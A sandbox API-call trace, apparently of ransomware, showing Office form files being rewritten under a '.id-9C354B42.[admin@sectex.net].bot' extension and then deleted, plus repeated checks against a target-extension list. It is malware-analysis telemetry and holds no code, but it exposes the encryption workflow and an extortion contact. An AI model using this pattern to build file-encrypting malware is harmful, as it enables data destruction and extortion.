	[0160.265] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.267] GetLastError () returned 0x0
	[0160.267] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x30f, lpOverlapped=0x0) returned 1
	[0160.269] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x310, lpOverlapped=0x0) returned 1
	[0160.270] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.270] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0160.270] SetEndOfFile (hFile=0x398) returned 1
	[0160.270] CloseHandle (hObject=0x398) returned 1
	[0160.270] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.270] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.272] CloseHandle (hObject=0x3f0) returned 1
	[0160.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contact.cfg")) returned 1
	[0160.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.273] lstrlenW (lpString=".doc") returned 4
	[0160.273] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.273] lstrlenW (lpString=".docx") returned 5
	[0160.273] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.273] lstrlenW (lpString=".pdf") returned 4
	[0160.273] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.273] lstrlenW (lpString=".xls") returned 4
	[0160.273] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.273] lstrlenW (lpString=".xlsx") returned 5
	[0160.273] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.273] lstrlenW (lpString=".ppt") returned 4
	[0160.273] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.273] lstrlenW (lpString=".zip") returned 4
	[0160.273] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.273] lstrlenW (lpString=".rar") returned 4
	[0160.273] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.273] lstrlenW (lpString=".bz2") returned 4
	[0160.273] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.273] lstrlenW (lpString=".7z") returned 3
	[0160.274] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.274] lstrlenW (lpString=".dbf") returned 4
	[0160.274] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.274] lstrlenW (lpString=".1cd") returned 4
	[0160.274] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.274] lstrlenW (lpString=".jpg") returned 4
	[0160.274] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.274] lstrlenW (lpString=".doc") returned 4
	[0160.274] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString=".docx") returned 5
	[0160.274] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.274] lstrlenW (lpString=".pdf") returned 4
	[0160.274] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString=".xls") returned 4
	[0160.274] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString=".xlsx") returned 5
	[0160.274] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.274] lstrlenW (lpString=".ppt") returned 4
	[0160.274] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.274] lstrlenW (lpString=".zip") returned 4
	[0160.274] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString=".rar") returned 4
	[0160.274] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.274] lstrlenW (lpString=".bz2") returned 4
	[0160.274] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.274] lstrlenW (lpString=".7z") returned 3
	[0160.275] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.275] lstrlenW (lpString=".dbf") returned 4
	[0160.275] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.275] lstrlenW (lpString=".1cd") returned 4
	[0160.275] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACT.CFG") returned 65
	[0160.275] lstrlenW (lpString=".jpg") returned 4
	[0160.275] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.275] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.275] lstrlenW (lpString="CONTACTL.ICO") returned 12
	[0160.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.276] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0160.276] CloseHandle (hObject=0x3f0) returned 1
	[0160.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico")) returned 0x20
	[0160.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.276] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.276] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.277] GetLastError () returned 0x0
	[0160.277] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0160.278] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0160.279] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.279] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.279] SetEndOfFile (hFile=0x398) returned 1
	[0160.279] CloseHandle (hObject=0x398) returned 1
	[0160.280] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.280] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.282] CloseHandle (hObject=0x3f0) returned 1
	[0160.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.282] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contactl.ico")) returned 1
	[0160.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.283] lstrlenW (lpString=".doc") returned 4
	[0160.283] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.283] lstrlenW (lpString=".docx") returned 5
	[0160.283] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.283] lstrlenW (lpString=".pdf") returned 4
	[0160.283] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.283] lstrlenW (lpString=".xls") returned 4
	[0160.283] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.283] lstrlenW (lpString=".xlsx") returned 5
	[0160.283] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.283] lstrlenW (lpString=".ppt") returned 4
	[0160.283] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.283] lstrlenW (lpString=".zip") returned 4
	[0160.283] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.283] lstrlenW (lpString=".rar") returned 4
	[0160.283] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.283] lstrlenW (lpString=".bz2") returned 4
	[0160.283] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.283] lstrlenW (lpString=".7z") returned 3
	[0160.283] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.284] lstrlenW (lpString=".dbf") returned 4
	[0160.284] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.284] lstrlenW (lpString=".1cd") returned 4
	[0160.284] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.284] lstrlenW (lpString=".jpg") returned 4
	[0160.284] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.284] lstrlenW (lpString=".doc") returned 4
	[0160.284] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.284] lstrlenW (lpString=".docx") returned 5
	[0160.284] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.284] lstrlenW (lpString=".pdf") returned 4
	[0160.284] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.284] lstrlenW (lpString=".xls") returned 4
	[0160.284] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.284] lstrlenW (lpString=".xlsx") returned 5
	[0160.284] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.284] lstrlenW (lpString=".ppt") returned 4
	[0160.284] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.284] lstrlenW (lpString=".zip") returned 4
	[0160.284] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.284] lstrlenW (lpString=".rar") returned 4
	[0160.284] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.284] lstrlenW (lpString=".bz2") returned 4
	[0160.284] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.284] lstrlenW (lpString=".7z") returned 3
	[0160.285] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.285] lstrlenW (lpString=".dbf") returned 4
	[0160.285] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.285] lstrlenW (lpString=".1cd") returned 4
	[0160.285] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTL.ICO") returned 66
	[0160.285] lstrlenW (lpString=".jpg") returned 4
	[0160.285] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.285] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.285] lstrlenW (lpString="CONTACTS.ICO") returned 12
	[0160.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.286] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0160.286] CloseHandle (hObject=0x3f0) returned 1
	[0160.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico")) returned 0x20
	[0160.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.286] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.286] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.287] GetLastError () returned 0x0
	[0160.287] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.288] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.289] ReadFile (in: hFile=0x3f0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.289] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.289] SetEndOfFile (hFile=0x398) returned 1
	[0160.289] CloseHandle (hObject=0x398) returned 1
	[0160.289] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.289] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.291] CloseHandle (hObject=0x3f0) returned 1
	[0160.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\contacts.ico")) returned 1
	[0160.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.292] lstrlenW (lpString=".doc") returned 4
	[0160.292] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.293] lstrlenW (lpString=".docx") returned 5
	[0160.293] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.293] lstrlenW (lpString=".pdf") returned 4
	[0160.293] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.293] lstrlenW (lpString=".xls") returned 4
	[0160.293] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.293] lstrlenW (lpString=".xlsx") returned 5
	[0160.293] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.293] lstrlenW (lpString=".ppt") returned 4
	[0160.293] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.293] lstrlenW (lpString=".zip") returned 4
	[0160.293] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.293] lstrlenW (lpString=".rar") returned 4
	[0160.293] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.293] lstrlenW (lpString=".bz2") returned 4
	[0160.293] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.293] lstrlenW (lpString=".7z") returned 3
	[0160.293] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.293] lstrlenW (lpString=".dbf") returned 4
	[0160.293] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.293] lstrlenW (lpString=".1cd") returned 4
	[0160.293] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.293] lstrlenW (lpString=".jpg") returned 4
	[0160.293] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.294] lstrlenW (lpString=".doc") returned 4
	[0160.294] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.294] lstrlenW (lpString=".docx") returned 5
	[0160.294] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.294] lstrlenW (lpString=".pdf") returned 4
	[0160.294] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.294] lstrlenW (lpString=".xls") returned 4
	[0160.294] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.294] lstrlenW (lpString=".xlsx") returned 5
	[0160.294] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.294] lstrlenW (lpString=".ppt") returned 4
	[0160.294] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.294] lstrlenW (lpString=".zip") returned 4
	[0160.294] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.294] lstrlenW (lpString=".rar") returned 4
	[0160.294] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.294] lstrlenW (lpString=".bz2") returned 4
	[0160.294] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.294] lstrlenW (lpString=".7z") returned 3
	[0160.294] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.294] lstrlenW (lpString=".dbf") returned 4
	[0160.294] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.294] lstrlenW (lpString=".1cd") returned 4
	[0160.294] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\CONTACTS.ICO") returned 66
	[0160.294] lstrlenW (lpString=".jpg") returned 4
	[0160.294] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.295] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.295] lstrlenW (lpString="DISTLIST.CFG") returned 12
	[0160.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.443] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=805) returned 1
	[0160.443] CloseHandle (hObject=0x25c) returned 1
	[0160.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg")) returned 0x20
	[0160.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.684] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.684] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
